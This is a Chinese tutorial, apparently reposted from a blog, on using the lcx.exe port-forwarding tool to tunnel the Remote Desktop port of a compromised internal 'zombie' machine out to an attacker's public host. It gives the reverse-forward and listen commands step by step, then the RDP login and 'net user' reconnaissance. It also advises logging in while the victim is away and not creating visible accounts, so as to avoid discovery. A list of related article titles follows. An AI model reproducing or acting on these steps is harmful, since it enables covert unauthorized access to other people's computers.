lcx.exe转发原理及其教程
来源:互联网 发布:添加打印机的端口名称 编辑:程序博客网 时间:2024/09/21 09:05
网络环境:
(1)主机A可以随意连接外网
(2)主机B在外网无法连接未经防火墙许可的端口(例如 3389端口)
原理:
(1)内网主机A主动连接外网主机B的80端口
(2)主机B的80端口接受的数据转到5630端口
(3)从5630端口输入的数据也可以转到80端口
(4)从80端口输入的数据传到主机A
(5)主机A上的端口转发工具(LCX)再把从主机B的80 端口收到的数据转到主机A的3389端口。
(6)从主机A的3389端口输入的数据也可以 到达主机B
用法:
在主机B上直接连接 : 127.0.0.1:5630 就可以连接到内网主机A的3389端口了。
通过本案例可以学习到:
(1)了解端口转发方面的相关知识
(2)使用工具软件lcx来进行端口转发
Lcx.exe是一个端口转发工具,相当于把肉鸡A上的3389端口转发到具有外网IP地址的B机上,这样连接B机的3389端口就相当于链接 A机的3389端口。Lcx程序多用于被控制计算机(肉鸡)处于内网的情况,被控制机可能中了木马程序,虽然能够进行控制,但还是没有使用远程终端登陆到 本机进行管理方便,因此在很多情况下,都会想方设法在被控制计算机上开启3389端口,然后通过lcx等程序进行端口转发,进而在本地连接到被控制计算机 的远程终端并进行管理和使用。
步骤1:确定被控制计算机的IP地址。在被控制计算机上开启远程终端,然后执行“ipconfig /all”命令,查看其网络配置情况,如图1所示,该计算机的ip地址为“192.168.80.129”
图1 确定被控制计算机的IP地址
步骤2:在被控制计算机上执行端口转发命令。在被控制计算机上执行“lcx –slave 218.69.*.* 51 192.168.80.129 3389”,如图2所示,执行完毕后会给出一些提示,如果显示为“Make a Connection to 218.69.*.*:51”则表示端口转发正确。
图2在被控制计算机上执行转发命令
说明
lcx一共有三条命令,第一条命令(lcx –lister 51 3389)是在具有外网独立IP的计算机上执行,表示在本机上监听51端口,该端口主要是接受被控制计算机3389端口转发过来的数据。第二条命令 (lcx –slave 218.69.*.* 51 192.168.80.129 3389)表示将本机IP地址为192.168.80.129的3389端口转发到远程地址为“218.69.*.*”的51端口。第三条命令是端口转 向。
步骤3:在本机上执行监听命令。在本机上打开DOS命令提示符,然后到lcx.exe程序所在路径执行“lcx –lister 51 3389”命令,监听51端口,监听成功后,会显示如图3所示的数据。
图3 在本机上监听51端口
注意
(1)在本机上监听的端口必须是未使用的端口,可以使用“netstat -an |find "51" ”命令进行查看,如果没有显示结果则表示51端口可以用来进行监听。
(2)被控制计算机与本机成功建立连接后会不停的显示连接数据,如图4所示,如果未出现数据发送和接受的情况,说明连接建立不成功。
图4成功建立连接
步骤4:在本机使用远程终端进行登录。在DOS提示符下输入“mstsc”命令打开远程终端连接器,输入“127.0.0.1”后单击“连接” 按钮进行远程终端连接,在出现登录界面后分别收入用户名和密码,验证通过后,即可远程进入被控制计算机的桌面,如图5所示,输入“ipconfig /all”以及“net user”命令来查看网络配置情况以及用户信息。
图5远程登入被控制计算机
注意
(1)如果被控制计算机是服务器,则在登陆时可以直接进行登陆;如果被控制计算机是Windows XP系统,则最好选择用户不在计算机的时间进行登陆,否则容易被发现。
(2)不要轻易在被控制计算机上建立账号,尤其是Windows XP,建立帐号后,会立即在登陆界面中进行显示。
步骤5:查看本地连接。在被控制计算机上使用“netstat -an”查看当前所有的连接时,可以看到被控制计算机时在跟自己进行远程终端连接,如图6所示,而实际的3389端口是跟本机的51端口进行连接的。
图6查看实际网络连接
小结
本案例通过使用lcx端口转发程序,成功的在本机连入被控制计算机的内网,可以很方便的对该计算机进行远程管理,在进行内网渗透时尤为有用。
- lcx.exe转发原理及其教程
- lcx.exe 转发
- lcx转发3389数据
- lcx不能转发ftp解决
- LCX端口转发源码分析
- Lcx端口转发和映射
- LCX端口转发源码分析
- LCX端口转发工具使用
- 用lcx.exe做内网端口映射
- 端口转发工具lcx的使用总结(lcx下载)
- 使用LCX进行内网端口转发
- lcx端口转发工具的使用
- 端口转发工具lcx使用两类
- lcx
- 攻防实战:使用Lcx进行内网端口转发
- linux下内网端口转发工具:linux版lcx 使用方法
- 攻防实战:使用Lcx进行内网端口转发
- 三个入侵的必备小工具-lcx.exe、nc.exe、sc.exe
- Netty:一个非阻塞的客户端/服务器框架
- jvm 5.0中调配Garbage Collection
- gcc & gdb & make 定义与区别
- Linux下autoconf和automake使用
- 基于GDAL的面数据保存
- lcx.exe转发原理及其教程
- 移动开发者必须了解的三大职业趋势
- Java中的String类的认识
- JNDI详解
- <Android>设计模式的工厂模式(待补充)
- Think in Java(七):内部类
- Unix 网络编程(四)- 典型TCP客服服务器程序开发实例及基本套接字API介绍
- Android 百度地图--定位、周边搜索
- java复习第十课,方法的本质,形参和实参(很重要)